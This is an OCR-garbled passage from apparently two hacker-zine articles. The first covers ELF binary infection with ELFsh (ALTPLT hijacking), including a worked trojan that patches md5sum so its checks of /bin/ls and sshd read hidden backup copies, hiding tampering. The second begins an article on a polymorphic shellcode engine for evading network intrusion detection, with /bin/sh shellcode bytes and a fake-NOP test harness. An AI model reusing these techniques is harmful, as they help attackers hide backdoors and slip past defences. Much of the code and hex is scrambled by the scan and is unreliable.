_ puts + 6 push $10 68 10 00 00 00 
puts + 11 jmp <old_dlresolve> E9 CO FF FF FF 
+ 0 jmp <puts_troj> E9 47 ED FF FF 
+ 5 or Sch, 10 (%eax) 08 68 10 
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puts + 8 add Sal, (%eax) 

puts + 10 add Sch, cl 

puts + 12 sar SFF,%bh 

puts + 15 (bad) sedi 

a ee: END EXAMPLE 13-----— 

On SPARC: 

ee BEGIN EXAMPLE 14----—- 

old_puts + 0 sethi %hi(0xf000), %gl1 
old_puts + 4 b,a e0f4 <func2+0xle0c> 
old_puts + 8 nop 

puts + 0 jmp %gl + Oxf4 ! <puts_troj> 
puts + 4 nop 

puts + 8 sethi %hi(0x12000), %g1 
SSS END EXAMPLE 14----—-— 


00 
00 
CO 
FF 


FF 


03 
30 
Ol 


00 
bf 
00 


00 
ie 
00 


3c 
£0 
00 


81 
O1 
03 


cO 
00 
00 


60 
00 
00 


£4 
00 
48 


This is the only architecture dependant operation in the ALTPLT 


It means that this feature can b 


algorithm. 
for other processors as well. However, 
Indeed, the SPARC architecture does not use 
(.got) for function address resolving, 
directly modified at dynamic linking time. 


instead the 


implemented very easily 


on SPARC there is one more 
modification to do on the first entry of the 


-orig.plt section. 
a Global Offset Table 
-plt section is 


Except for this 


difference, the SPARC .plt works just the same as INTEL .plt (both 
are using the first .plt entry each time, as explained in the ELF 
reference). 


For this reason, 


it point on the first .plt entry 


the main() function takes control). 
use a register other than %gl 


we have to modify the first 
(which is patched in runtime before 
In order to patch it, 
(since this one is used by the dynamic 


-orig.plt entry to make 


we need to 


linker to identify the .plt entry which has to be patched), for 
example %g2 (elfsh_hijack_plt_sparc_g2 in libelfsh/hijack.c). 
Patched first .orig.plt entry on SPARC: 
eerie BEGIN EXAMPLE 15----- 
orig.plt sethi %hi(0x20400), %g2 05 00 00 81 
orig.plt jmp $g2 + Ox2a8 ! <.plt> 81 cO a2 a8 
orig.plt nop 01 00 00 00 
SSS END EXAMPLE 15----—- 


The reason for NOP instructions after t 
(jmp) is because of SPARC delay slot. I 
is done in such way that it changes the 
Counter) and not the PC register, and t 
branching one is executed before the r 


NPC 
he i 
a 


he branching instruction 
n short, 


SPARC branchement 
register (New Program 
nstruction after a 


1 branchement. 


cy 


R 


Let’s use a new example which combines 


EL injection and ALTPLT 


infection this time 


(instead of GOT redirection, 


like in the previous 


sshd example). We will modify md5sum so that access to /bin/ls and 
/usr/sbin/sshd is redirected. In that case, we need to hijack the 
fopen64() function used by md5sum, swap the real path with the 


backup path if necessary, 


and call the original fopen64 as if 


nothing had happene 


EGIN EXAMPLE 
$ cat mdl6.esh 
#!/usr/bin/elfsh 


as 
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load /usr/bin/md5sum 
load test.o 


Add test.o into md5sum 
reladd 1 2 


Redirect fopen64 to fopené4_troj (in test.o) using ALTPLT technique 
redir fopen64 fopen64_troj 


save md5sum.new 
quit 
S chmod +x mdl6.esh 


----- END EXAMPLE 16----- 


Let’s look at the injected code. Because the strcemp() libc 
function is not used by md5sum and therefore its symbol is not 
available in the binary, we have to copy it in the module 
source: 


----- BEGIN EXAMPLE 17----- 
S$ cat test.c 


include <stdlib.h> 

define HIDDEN_DIR "/path/to/hidden/dir" 
define LS "/bin/1ls" 

define SSHD "/usr/sbin/sshd" 
define LS_BAO "ls.bag" 

define SSHD_BAQO "sshd.baq" 

int mystremp(char *strl, char *str2) 


u_int cnt; 


for (cnt = 0; stri[cnt] && str2[cnt]; cnt+t) 


if (strlfcnt] != str2[cnt]) 
return (strif[cnt] - str2[cnt]); 
return (strif[cnt] - str2[cnt]); 
} 
int fopen64_troj(char *strl, char *str2) 


{ 
if (!mystrcemp(strl, LS) ) 
strl = HIDDEN _DIR "/" LS_BAQ; 
else if (!mystrcmp(str1, SSHD)) 
strl = HIDDEN_DIR "/" SSHD_BAQ; 
return (old_fopen64(strl, str2)); 


} 


S. .9¢C¢ (test..c) —¢ 


$ 

----- END EXAMPLE 17----- 
For this last example, the full relinking information 
will be printed on stdout, so that the reader can enjoy 
all the details of the implementation: 

----- BEGIN EXAMPLE 18----- 

$ 


ELF shell 0.5b9 


5 


Welcome to The 


This software is under the General Public License 
Please visit http://www.gnu.org to know about Free Software 
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load /usr/bin/md5sum 

*] New object /usr/bin/md5sum loaded on Sat Aug 2 16:16:32 2003 
“OXSC. CC LESEAG SG 
*] Command executed successfully 


load test.o 
*] New object test.o loaded on Sat Aug 2 16:16:32 2003 


“reladd 1 2 

DEBUG_RELADD] Found BSS zone lenght [00000000] for module [test.o] 
DEBUG_RELADD] Inserted STT_SECT symbol test.o.text O80470F4 
DEBUG_RELADD] Inserted STT_SECT symbol test.o.rodata 080460F4 
DEBUG_RELADD] Inserted STT_SECT symbol .orig.plt 080450F4 
DEBUG_RELADD] Injected symbol old_dlresolve 080450F4 
DEBUG_RELADD] Injected symbol old_ferror 08045104 
DEBUG_COPYPLT] Symbol at .plt + 16 injected succesfully 
DEBUG_RELADD] Injected symbol old_strchr 08045114 
DEBUG_COPYPLT] Symbol at .plt + 32 injected succesfully 
DEBUG_RELADD] Injected symbol old_feof 08045124 
DEBUG_COPYPLT] Symbol at .plt + 48 injected succesfully 
DEBUG_RELADD] Injected symbol old register_frame_info 08045134 
DEBUG_COPYPLT] Symbol at .plt + 64 injected succesfully 
DEBUG_RELADD] Injected symbol old getdelim 08045144 
DEBUG_COPYPLT] Symbol at .plt + 80 injected succesfully 
DEBUG_RELADD] Injected symbol old_fprintf 08045154 
DEBUG_COPYPLT] Symbol at .plt + 96 injected succesfully 
DEBUG_RELADD] Injected symbol old_fflush 08045164 
DEBUG_COPYPLT] Symbol at .plt + 112 injected succesfully 
DEBUG_RELADD] Injected symbol old_dcgettext 08045174 
DEBUG_COPYPLT] Symbol at .plt + 128 injected succesfully 
DEBUG_RELADD] Injected symbol old_setlocale 08045184 
DEBUG_COPYPLT] Symbol at .plt + 144 injected succesfully 
DEBUG_RELADD] Injected symbol old___errno_location 08045194 
DEBUG_COPYPLT] Symbol at .plt + 160 injected succesfully 
DEBUG_RELADD] Injected symbol old_puts 080451A4 
DEBUG_COPYPLT] Symbol at .plt + 176 injected succesfully 
DEBUG_RELADD] Injected symbol old_malloc 080451B4 
DEBUG_COPYPLT] Symbol at .plt + 192 injected succesfully 
DEBUG_RELADD] Injected symbol old_fread 080451C4 
DEBUG_COPYPLT] Symbol at .plt + 208 injected succesfully 
DEBUG_RELADD] Injected symbol old___deregister_frame_info [080451D4] 
DEBUG_COPYPLT] Symbol at .plt + 224 injected succesfully 
DEBUG_RELADD] Injected symbol old_bindtextdomain 080451E4 
DEBUG_COPYPLT] Symbol at .plt + 240 injected succesfully 
DEBUG_RELADD] Injected symbol old_fputs 080451F4 
DEBUG_COPYPLT] Symbol at .plt + 256 injected succesfully 
DEBUG_RELADD] Injected symbol old libc_start_main 08045204 
DEBUG_COPYPLT] Symbol at .plt + 272 injected succesfully 
DEBUG_RELADD] Injected symbol old_realloc 08045214 
DEBUG_COPYPLT] Symbol at .plt + 288 injected succesfully 
DEBUG_RELADD] Injected symbol old_textdomain 08045224 
DEBUG_COPYPLT] Symbol at .plt + 304 injected succesfully 
DEBUG_RELADD] Injected symbol old_printf 08045234 
DEBUG_COPYPLT] Symbol at .plt + 320 injected succesfully 
DEBUG_RELADD] Injected symbol old_memcpy 08045244 
DEBUG_COPYPLT] Symbol at .plt + 336 injected succesfully 
DEBUG_RELADD] Injected symbol old_fclose 08045254 
DEBUG_COPYPLT] Symbol at .plt + 352 injected succesfully 
DEBUG_RELADD] Injected symbol old_getopt_long 08045264 
DEBUG_COPYPLT] Symbol at .plt + 368 injected succesfully 
DEBUG_RELADD] Injected symbol old_fopen64 08045274 
DEBUG_COPYPLT] Symbol at .plt + 384 injected succesfully 
DEBUG_RELADD] Injected symbol old_exit 08045284 
DEBUG_COPYPLT] Symbol at .plt + 400 injected succesfully 
DEBUG_RELADD] Injected symbol old_calloc 08045294 
DEBUG_COPYPLT] Symbol at .plt + 416 injected succesfully 
DEBUG_RELADD] Injected symbol old__IO_putc 080452A4 
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DEBUG_COPYPLT] Symbol at .plt + 432 injected succesfully 
DEBUG_RELADD] Injected symbol old_free 080452B4 
DEBUG_COPYPLT] Symbol at .plt + 448 injected succesfully 
DEBUG_RELADD] Injected symbol old_error 080452C4 
DEBUG_COPYPLT] Symbol at .plt + 464 injected succesfully 
DEBUG_RELADD] Entering intermediate symbol injection loop 
DEBUG_RELADD] Injected ET_REL symbol mystrcmp 080470F4 
DEBUG_RELADD] Injected symbol mystrcmp 080470F4 
DEBUG_RELADD] Injected ET_REL symbol fopen64_troj 08047188 
DEBUG_RELADD] Injected symbol fopen64_troj 08047188 
DEBUG_RELADD] Entering final relocation loop 
DEBUG_RELADD] Relocate using section test.o.rodata base [-> 080460F4] 
DEBUG_RELADD] Relocate using section test.o.text base [-> 080470F4] 
DEBUG_RELADD] Relocate using section test.o.rodata base [-> 080460FC] 
DEBUG_RELADD] Relocate using section test.o.rodata base [-> 08046117] 
DEBUG_RELADD] Relocate using section test.o.text base [-> 080470F4] 
DEBUG_RELADD] Relocate using section test.o.rodata base [-> 08046126] 
DEBUG_RELADD] Relocate using existing symbol old_fopen64 [08045274] 
*] ET_REL test.o injected succesfully in ET_EXEC /usr/bin/md5sum 
“redir fopen64 fopen64_troj 


save md5sum.new 
* 


Object md5sum.new sav 


successfully 


Function fopen64 redirected to addr 0x08047188 <fopen64_troj> 


quit 
Unloading object 1 (test.o) 
Unloading object 2 (/usr/bin/md5sum) * 
Good bye ! The ELF shell 0.5b9 
$ 
=a =| END EXAMPLE 18---—-—-— 
As shown in the script output, the new file has got new 
symbols (the old symbols). Let’s observe them using the 
elfsh ’-sym’ command and the regex capability (’old’) 

aS BEGIN EXAMPLE 19----- 

S elfsh -q -f md5sum.new -sym old 

SYMBOL TABLE] 

Object mdd5sum.new] 

27] Ox80450f4 FUNC old_dlresolve sz:16 scop:Local 
28] 0x8045104 FUNC old_ferror sz:16 scop:Local 
29] 0x8045114 FUNC old_strchr sz:16 scop:Local 
30] 0x8045124 FUNC old_feof sz:16 scop:Local 
31] 0x8045134 FUNC old___register_frame_info sz:16 scop:Local 
32] 0x8045144 FUNC old___getdelim sz:16 scop:Local 
33] 0x8045154 FUNC old_fprintf sz:16 scop:Local 
34] 0x8045164 FUNC old_fflush sz:16 scop:Local 
35] 0x8045174 FUNC old_decgettext sz:16 scop:Local 
36] 0x8045184 FUNC old_setlocale sz:16 scop:Local 
37] 0x8045194 FUNC old___errno_location sz:16 scop:Local 
38] 0x80451a4 FUNC old_puts sz:16 scop:Local 
39] 0x80451b4 FUNC old_malloc sz:16 scop:Local 
40] 0x80451c4 FUNC old_fread sz:16 scop:Local 
41] 0x80451d4 FUNC old___deregister_frame_info sz:16 scop:Local 
42] 0x80451le4 FUNC old_bindtextdomain sz:16 scop:Local 
43] 0x80451f4 FUNC old_fputs sz:16 scop:Local 
44] 0x8045204 FUNC old libc_start_main sz:16 scop:Local 
45] 0x8045214 FUNC old_realloc sz:16 scop:Local 
46] 0x8045224 FUNC old_textdomain sz:16 scop:Local 
47] 0x8045234 FUNC old_printf sz:16 scop:Local 
48] 0x8045244 FUNC old_memcpy sz:16 scop:Local 
49] 0x8045254 FUNC old_fclose sz:16 scop:Local 
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50] 0x8045264 FUNC old_getopt_long sz:16 scop:Local 
51] 0x8045274 FUNC old_fopen64 sz:16 scop:Local 
52] 0x8045284 FUNC old_exit sz:16 scop:Local 
53] 0x8045294 FUNC old_calloc sz:16 scop:Local 
54] 0x80452a4 FUNC old__IO_putc sz:16 scop:Local 
55] 0x80452b4 FUNC old_free sz:16 scop:Local 
56] 0x80452c4 FUNC old_error sz:16 scop:Local 


—---- END EXAMPLE 19----- 


It sounds good ! Does it work now? 


S md5sum /bin/bash 

ebel £822a4d026c366c8b6294d828c87 /bin/bash 
S ./md5sum.new /bin/bash 

ebel £822a4d026c366c8b6294d828c87 /bin/bash 


$ md5sum /bin/1s 
3b622e€661f6f5cC79376c73223ebd7f4d /bin/1s 

S$ ./md5sum.new /bin/1s 

./md5sum.new: /bin/ls: No such file or directory 


$ md5sum /usr/sbin/sshd 
720784b7cle5f£3418710c7c5ebb0286c /usr/sbin/sshd 

S ./md5sum.new /usr/sbin/sshd 

./mdS5sum.new: /usr/sbin/sshd: No such file or directory 


S ./md5sum.new ./md5sum.new 
b52b87802b7571clebbb10657cedb1f6 ./md5sum.new 

S ./md5sum.new /usr/bin/md5sum 
8beca981a42308c680C9669166068176 /usr/bin/md5sum 
$ 


Heheh. It work so well that even if you forget to put the original 


copy in your hidden directory, md5sum prints the original path and 
not your hidden directory path ;). This is because we only change a 
local pointer in the fopen64_troj() function, and the caller function 


is not aware of the modification, so the caller error message is 
proceeded with the original path. 


Let’s give the detailed algorithm for the ALTPLT technique. It must 
be used as a ’2 bis’ step in the main ET_REL injection algorithm 
given in the previous chapter, so that injected code can use any 
old_* symbols: 


Create new section header with same size, type, rights as .plt 
Insert new section header 
IF current OS == FreeBSD 


- Inject section using post-bss technique. 


ELSE 


- Inject section using pre-interp technique. 


FOREACH .plt entry (while counter < sh_size) 


IF counter == 0 AND current architecture is SPARC 

[ 
- Infect current entry using %g2 register. 

] 

- Inject new ’old_<name>’ symbol pointing on current entry 
(= sh_addr + cnt) 
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'redir’ 


24 


(SPARC: 12, INTEL: 16) to cnt 


This algorithm is executed once and only once per ET_EXEC file. The 


command actually performs the PLT infection on demand. A 


futur 


(better) 


version of this command would allow core binary 
function hijacking. Since the code segment is read-only in userland, 


function. 


we cant modify the first bytes of the function at runtime and perform 
some awful bytes restoration [13] 
The best solution is probably to build full control flow 


[14] for calling back the original 


graphs for the target architecture, and redirect all calls to a given 


block (e.g. 


the first block of the hijacked function), making all 


these calls point to the hook function, as suggested in [15] . ELFsh 
provides INTEL control flow graphs (see modflow/modgraph), so does 
16], but the feature is not yet available for other 


objobf 


[ 


architectures, and some specific 
are not easily predictable [17] using static analysis only, so it 
remains in the TODO. 


indirect branchement instructions 


This is the end, beautiful friend. This is the end, my only friend, 
the end... Of course, there is a 


features in this area. 


alpha, 
ELF 64) 


libelfsh API and the script 
framework and all comme 


------- [ 6. 


a 


lot of place for improvements and new 


More target architectures are planed (pa-risc, 
pec?), as well as more ELF objects support (version tables, 


nd extension for the script langage with simple data and 
control flow support. The ELF development is made easy using the 
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--[ 1 - Abstract 


Nowadays, polymorphic is maybe an overused word. Some programs called 
polymorphism engine have been lately released with constant decipher 
routines. Polymorphism is a method against pattern matching (cf 3.2), 

if you have constant consecutive bytes in the code you generate, NIDS 
will always be able to recognize the signature of those constant bytes... 


In some real engine (which generate non-constant decipher routine like 
ADMmutate), there are some weaknesses left (maybe weaknesses isn’t the 
best word since the recent NIDS are not able to exploit them) like the 
XOR problem (cf 4.2) or a NOP zone with only one byte instructions 

(cf 4.1). In our engine, we have been interested in these problems (cf 4) 
and we have tried to implement some solutions. We have tried too to 
implement methods against the next generation of NIDS using data-mining 
methods (cf 5). 


However we don’t claim to have created an /’ultimate’ polymorphic 

ngine. We are aware of some weaknesses that exist and can be solved with 
solutions we expose below but we haven’t implemented yet. There ar 
probably some weaknesses too we’re not aware of, your mails are welcome 
for the next version. 


This article explains our work, our ideas, we hope you will enjoy it. 


--[ 2 - Introduction 


Since the famous "Smashing the stack for fun and profit", the technique 
of buffer overflow has been widely used to attack systems. 


To confine the threat new defense systems have appeared based on pattern 
matching. Nowadays, Intrusion Detection System (IDS) listen the trafic 
and try to detect and deny packets containing shellcode used in buffer 
overflow attacks. 


On the virus scene, a technique called polymorphism appeared in 1992. The 
idea behind this technique is very simple, and this idea can be applied to 


9.txt Wed Apr 26 09:43:44 2017 2 


shellcodes. ADMmutate is a first public attempt to apply polymorphism to 
shellcode. 


Our aim was to try to improve the technique, find enhancements and to 
apply them to an effective polymophic shellcod ngin 


--[ 3 - Polymorphism: principles and usefulness against NIDS. 
----[ 3.1 - Back in 1992... 


In 1992, Dark Avenger invented a revolutionary technique he called 
polymorphism. What is it ? It simply consist of ciphering the code of the 
virus and generate a decipher routine which is different at each time, so 
that the whole virus is different at each time and can’t be scanned ! 


Very good polymorphic engines have appeared : the TridenT Polymorphic 
Engine (TPE), Dark Angel Mutation Engine (DAME). 


As a consequence, antivirus makers developped new heuristic techniques 
such as spectrum analysis, code emulators, 


----[ 3.2 - Principles of polymorphism 


Polymorphism is a generic method to prevent pattern-matching. Pattern- 
matching means that a program P (an antivirus or an IDS) has a data-base 
with ’signatures’. A signature is bytes suite identifying a program. 
Indeed, take the following part of a shellcode: 


push byte 0x68 

push dword 0x7361622f 
push dword 0x6e69622f 
mov ebx,esp 


xor edx, edx 
push edx 
push ebx 
mov ecx,esp 
push byte 11 
pop eax 

int 80h 


This part makes an execve("/bin/bash", ["/bin/bash",NULL],NULL) call. 
This part is coded as: 
"\ x6A\x68\x68\x2F\x62\x61\x73\x68\x2F\x62\x69\x6E\x89\xE3\x31\xD2" 
"\x52\x53\x89\xE1\x6A\x0B\x58\xCD\x80". 

If you locate this contiguous bytes in a packet destinated to a web 
server, it can be an attack. An IDS will discard this packet. 

Obviously, there are other methods to make an execve call, however, it 
will make an other signature. That’s what we call pattern matching. 

Speak about viruses or shellcodes is not important, the principles are the 
same. We will s later the specificities of shellcodes. 


Imagine now you have a code C that a program P is searching for. Your 
code is always the same, that’s normal, but it’s a weakness. P can have 
a caracteristic sample, a signature, of C and make pattern matching to 
detect C. And then,C is no longer useable when P is running. 


The first idea is to cipher C. Imagine C is like that 
[CCCCCCC] 

Then you cipher it 
[KKKKKKKK] 


But if you want to use C, you must put a decipher routine in front of it 
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[DDDDKKKKKKkKK] 
Great ! You have ciphered C and the sample of C that is in P is no longer 
efficient. But you have introduced a new weakness because your decipher 
routine will be rather the same (except the key) each time and P will be 


able to have a sample of the decipher routine. 
So finally, you have ciphered C but it is still detected : ( 


And polymorphism was born ! 


The idea is to generate a different decipher routine each time."different" 
really means different, not just the key. You can do it with different 
means 
generate a decipher routine with different operations at each time. A 
classic cipher/decipher routine uses a XOR but you can use whatever 
operation that is reversible : ADD/SUB, ROL/ROR, 

generate fake code between the true decipher code. For example, if you 
don’t use some registers, you can play with them, making fake operations 
in the middle of th ffective decipher cod 
-— make all of them. 


So a polymorphism engine makes in fact 2 things 
-— cipher the body of the shellcode. 
generate a decipher routine which is _different_ at each time. 


----[ 3.3 - Polymorphism versus NIDS. 


A code of buffer overflow has three or four parts: 


| NOP | shellcode | bytes to cram | return adress | 


Nowadays, NIDS try to find consecutive NOPs and make pattern matching on 

the shellcodes when it believes to have detected a fakenop zone. This is 
not a really efficient method, however we could imagine methodes to 
recognize the part of bytes which cram the buffer or the numberous 
consecutive return adresses. 

So, our polymorphic engine have to work on each of those parts to make them 
unrecognizable. That’s what we try to do: 


— firstly, the NOPs series is changed in a series of random instructions 
(cf 4.1 "fake-nop") of 1,2,3 bytes. 


- secondly, the shellcode is ciphered (with a random method using more 
than an only XOR) and the decipher routine is randomly generated. 
(cf 4.2) 


-— thirdly, in a polymorphic shellcode, a big return adress zone has to 
be avoided. Indeed, such a big zone can be detected, particulary by 
data mining methods. To defeat this detection, the idea is to try to 
limit the size of the adress zone and to add bytes we choose between 
shellcode and this zone. This bytes are chosen randomly or by using 
spectrum analysis (cf 5.3.A). 


- endly, we haven’t found a better method than ADMmutate’s to covert 
the return adresses: since the return adresse is chosen with 
uncertainly, ADMmutate changes the low-weight bits of the return adress 
between the different occurences (cf 4.2). 


NB: Shellcodes are not exactly like virus and we can take advantage of it: 

- A virus must be very careful that the host program still works after 
infection ; a shellcode does not care! We know that the shellcode will 
be the last thing to be executed so we can do what we want with 
registers for example, no need to save them. 
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We can take good avantage of this, and in our fake-nop don’t try to make 
code which makes nothing (like INCR & DECR, ADD & SUB or PUSH & POP...) 
(what could be moreover easily recognizable by an IDS which would 
make code emulation). Our fake-nop is a random one-byte instructions 
code, and we describe another method (not implemented yet) to improve 
this, because generating only one-byte instructions is still a weakness. 
-— The random decipher method has to be polymorphed with random code (but 
not necessarily one-byte instructions) wich makes anything but without 
consequences on the deciphering (hum... not implemented yet : ( 
A shellcode must not have zeroes in it, since, for our using, we always 
using strings to stock our code. so we have to take care of it... 


Thus, this is what a polymorphic shellcode looks like: 


| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress | 


Let’s now study each part of it. 


--[ 4 - Make classical IDS pattern matching inefficient. 
----[ 4.1 - Fake NOPs zone with 2,3 bytes instructions. 
uae oe ae [ 4.1.A - Principles 


NOPs are necessary before the shellcode itself. In fact, why is it 
necessary ? Because we don’t know exactly where we jump, we just know we 
jump in the middle of the NOPs (cf article of Aleph One [1]). But it is 
not necessary to have NOPs, we can have almost any non-dangerous 
instructions. Indeed, we don’t have to save some register, the only 
condition we have is to arrive until the decipher routine without errors. 
However we can’t use any ’non-dangerous’ instructions. Indeed, remember 
we don’t know exactly where we jump. 


One method to avoid this problem is to make the nop zone with only one- 
byte instructions. Indeed, in such a case, wherever we jump we fall on 

an correct instruction. The problem of such a choice is that there is not 
a lot of one byte instructions. It is thus relatively easy for an IDS to 
detect the NOPs zone. Hopefully many one-byte instructions can be coded 
with an uppercase letter, and so we could hide the nop zone in an 
alphanumeric zone using the american-english dictionnary (option -a of 
clet). However, as we explain in 5, such a choice can be inefficience, 
above all when the service asked is not an ’alphanumeric service’ (cf 5). 


Thus the problem is : how could we generate a random fake-nop using 
several-bytes instructions to better covert our fake nop? 


There is a simple idea: we could generate two-byte intructions, the 
second byte of which is a one-byte instruction or the first byte of a 
two-byte instruction of this type and then recursively. 

But let’s see what can be problems of such a method. 


=a [ 4.1.B - Non-dangerous several bytes instructions. 


- Instructions using several bytes can be dangerous because they can 
modify the stack or segment selectors (etc...) with random effects. 
So we have to choice harmless instructions (to do it, the book [3] is 
our friend... but we have to make a lot of tests on the instructions we 
are choosing). 


Some times, several-bytes instructions ask for particular suffixes to 
specify a register or a way of using this instruction (see modR/M 

[3]). For example, instruction CMP rm32,imm32 (compare) with such a code 
"0x81 /7 id" is a 6-bytes instruction which asks for a suffix to specify 
the register to use, and this register must belong to the seventh column 
of the "32-bit adressing Forms with the modR/M Byte" (cf[3]). However, 
remember that everywhere the code pointer is pointing within the 
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fake-nop, it must be able to read a valid code. So the suffix and 
arguments of instructions must be instructions themselves. 


SSSR [ 4.1.C - An easy case 


IE 


Let’s take the string : \x15\x11\xF8\xFA\x81\xF9\x27\x2F\x90\x9 
If we are following this code from the begining, we are reading: 


ADC SOx11F8FA81 instruction demanding 4-bytes argument 
STC one-byte instructions 

DAA 

DAS 

NOP 

SAHF 


If we are begining from the second byte, we are reading: 
ADC %eax, %edx 
CMP %ecx, $0x272F909 


Gl 


Etc... We can begin from everywhere and read a valid code which makes 
nothing dangerous... 


Seance [ 4.1.D Test the fake-nop 


char shell[] = 

"\x99\x13\xF6\xF6\xF8" //our fake_nop 
"\x21\xF8\xF5\xAE" 

"\x98\x99\x3A\xF8" 

"\ xF6\xF8" 
"\x3C\x37\xAF\x9E" 
"\ xF9\x3A\xFC" 
"\ x9OF\x99\xAF\x2F" 
"\xF7\xF8\xF9\xAE" 
"\x3C\x81\xF8\xF9" 
"\x1lO\xF5\xF5\xF8" 
"\x3D\x13\xF9" 
"\x22\xFD\xF9\xAF" 


//shellcode 
"\xeb\xlf£\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 


int main () 

{ 
void (*go) ()=(void *) shell; 
go(); 
return(0); 


} 


We test a fake_nop string generate with our code... but it’s not really 
efficient as you can see 
when the adress (shellti) of the function go() is change the testing 


program exited with: 


shell —> sh-2.05bS 
shell+l > sh-2.05bS 
shell+2 -> Floating point exception Argh! 
shell+3 > sh-2.05bS 
shell+4 > sh-2.05bS 
shell+11 -> sh-2.05b$ 


We haven’t been car nough with the choice and the organization of our 
instructions for the fake_nop and then we can randomly have segfaults 
or Floating point exceptions... (Really boring) 
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aera [ 4.2 The decipher routine 


There are maybe two different methods to generate a decipher routine: 
—- you can use always the same routine but modify instructions. For 
instance you can use add eax,2 or inc eax; inc eax; the result will be 
the same but the code not. 

—- you can generate a different routine of decipher too. 


In this two methods, you can add code between instructions of the 

decipher routine. Obviously, this add code mustn’t modify running of this 
routine. 
€ 
i 
i 


ET have chosen the second approach, and we don’t generate code between 
nstructions because registers we use, order of instructions, type of 
nstructions (ADD,SUB,ROL,ROR,XOR) change each time. Thus it is not 
necessary to add instructions... 


* XOR with a fixed size key is not enough 


There is a problem with using a decipher routine with only a XOR anda 
fixed size key. Mark Ludwig [5] describes it in From virus to antivirus 
with a concret xample. The real problem comes from the associativity and 
commutativity of the XOR operation and from the constant size of the key. 


Imagine you cipher these two bytes Bl B2 with the key K, you obtain two 
ciphered bytes: Cl C2. 


Cl XOR C2 = (Bl XOR K) XOR (B2 XOR K) 
= Bl XOR K XOR B2 XOR K 
= Bl XOR B2 XOR K XOR K 
= Bl XOR B2 XOR (K XOR RK) 
= Bl XOR B2 XOR O 
= Bl XOR B2 
= Constant (independant on K) 


We understand why an encrypted shellcode with a only XOR decipher routine 
and a fixed size key let a carateristic signature of the shellcode. You 
just have to XOR bytes with their neighboor in case of a single byte key, 
you will always have the same result, which is independant on K. In case 
of you have a key of N bytes, to obtain the signature you XOR bytes k with 
bytes k+N. Such a signature could be exploited by the NIDS (however you 
need a lot of calculation power). 


It’s important to notice (thanks for those who tell us ;) ) that the real 
problem is not only a XOR. It’s an only-XOR encryption AND a fixed size 
key. Indeed, some vx polymorphic engines, use an only XOR in the 
encryption but the key is not the same for all the ciphering. The key 
changes, and size of the key too. In such a case, our demonstration is 
inefficient because Bl and B2 are not ciphered with the same key K and you 
don’t know where is the next byte ciphered with the same key (that’s what 
you know when you use an only-XOR encryption with a fixed size key of 
several bytes.) 


So a cipher routine using only a XOR and a fixed size key is not enough. 
In CLET we generate routines which cipher with several instructions XOR, 
ADD, ROR, 


* Random registers 


Remember we decide to generate a different decipher routine each time. 
Even if we change the type of ciphering each time, it is important too to 
modify asembler instructions that make this decipher routine. To do so, 

we have decided to change registers used. We need thr registers, one 

to record address where we are working, one to record byte we are working 
on, one more register for all the other things. We have the choice between 
ax,ebx,ecx,edx. Thus we randomly use three of this registers each time. 
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* Four bytes encryption to defeat spectrum analysis methods. 


Let’s begin to explain what we call a spectrum and what is spectrum 
analysis. 


A spectrum of a paquet gives you bytes and number of this bytes in this 
packet. 


For instance, the following board is a spectrum of a paquet called X: 


|} \x00]\x01|\x08|\xOB/]\x12|\xlA| ... |\xFE|\xFF| 


P22 32] 04 | 28 |) 56] 43) ]. e348 1 67 1 99° | 


This board means that there is 25 \x00 in X, 32 \x01, O \x02, 
This board is what we call spectrum of X. 


A spectrum analysis method makes spectrums of packets and create rules 
thanks to these spectrums. Some IDS use spectrum analysis methods to 
discard some packets. For instance, imagine that, in a normal trafic, you 
never have packets with more than 20 bytes of \xFF. You can make the 
following rule: discard packets with more than 20 bytes of \xFF. This 

is a very simple rule of spectrum analysis, in fact lots of rules are 
generated (with neural approach for instance, see 5.2) about spectrum of 
packets. This rules allow an IDS to discard some packets thanks to their 
spectrums. This is what we call a spectrum analysis method. 


Now, let’s see how an IDS can put together pattern matching and spectral 
analysis methods. 


The idea is to record signatures but not signatures of consecutive bytes, 
Signatures of spectrum. For instance, for the previous packet X, we 
record: 25, 32, 04, 18, 56, 43, ...., 67, 99. Why these values? Becaus 

if you use a lonely byte encryption these values will always be the same. 


In that way, if we cipher paquet X with the cipher routine XOR 02, ADD 1 
we obtain a packet X’ which spectrum is: 


| \x03]\x04|\xOA|\xOB/]\x11|]\x19| ... |\xFD|\xFI 


Gl 


ed, lh S20] 8" | AO AP TSO) ABS. [i vee, MM 67s ul eG) | 


This spectrum is different, order of values is different; however we have 
the same values but affected to other bytes. Spectrum signature is the 
same. With such a way of encryption, the spectrum of the occurences of 
each encrypted bytes is a permutation of the spectrum of the unencrypted 
bytes. The encryption of a lonely byte return a value which is unique and 
caracteristical of this byte, that’s really a problem. 


In order to avoid signatures similarities, the shellcode is four bytes 
encrypted and this method prevents us to have a singular spectrum of 
occurences. Indeed, if we crypt FFFFFFFF for instance with XOR AABBCCDD, 
ADD 1, we obtain 66554433. Thus, spectrum of X’ won’t be a permutation 
of spectrum of X. A four-bytes encryption allows us to avoid this kind 
of spectrum analysis. 


But spectrum analysis methods are just a kind of more general methods, 
called data-mining methods. We will see now what are these methods and 
how we can use spectrum analysis of the trafic to try to defeat this more 
general kind of methods. 


--[ 5 - Spectrum Analysis to defeat data mining methods 


----[ 5.1 - History 
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When vxers had discovered polymorphism, authors of antivirus were afraid 
that it was the ultimate solution and that pattern matching was dead. 

To struggle this new kind of viruses, they decided to modify their 
attacks. Antivirus with heuristic analysis were born. This antivirus tries 
for instance to execute the code in memory and test if this code modifies 
its own instructions (if it tries to decipher it for instance), in such 

a case, it can be a polymorphed virus. 

As we see upper, four-bytes encryption, not using an only XOR and a fixed 
size key, fakenop zone with more than one-byte instructions allow to 
‘defeat’ pattern matching. Perhaps it remains some weaknesses, however we 
think that polymorphism engines will be more and more efficient and that 
finally it will be too difficult to implement efficient pattern matching 
methods in IDS. 

Will IDS take example on the antivirus and try to implement heuristic 
method? We don’t think so because there is a big difference between IDS 
and antivirus, IDS have to work in real time clock mode. They can’t record 
all packets and analyse them later. Maybe an heuristic approach won’t be 
used. Besides, Snort IDS, which tries to develop methods against 
polymorphed shellcodes, don’t use heuristic methods but data mining 
methods. It’s probably these methods which will be developped, so that’s 
against these methods we try to create polymorphic shellcodes as we 
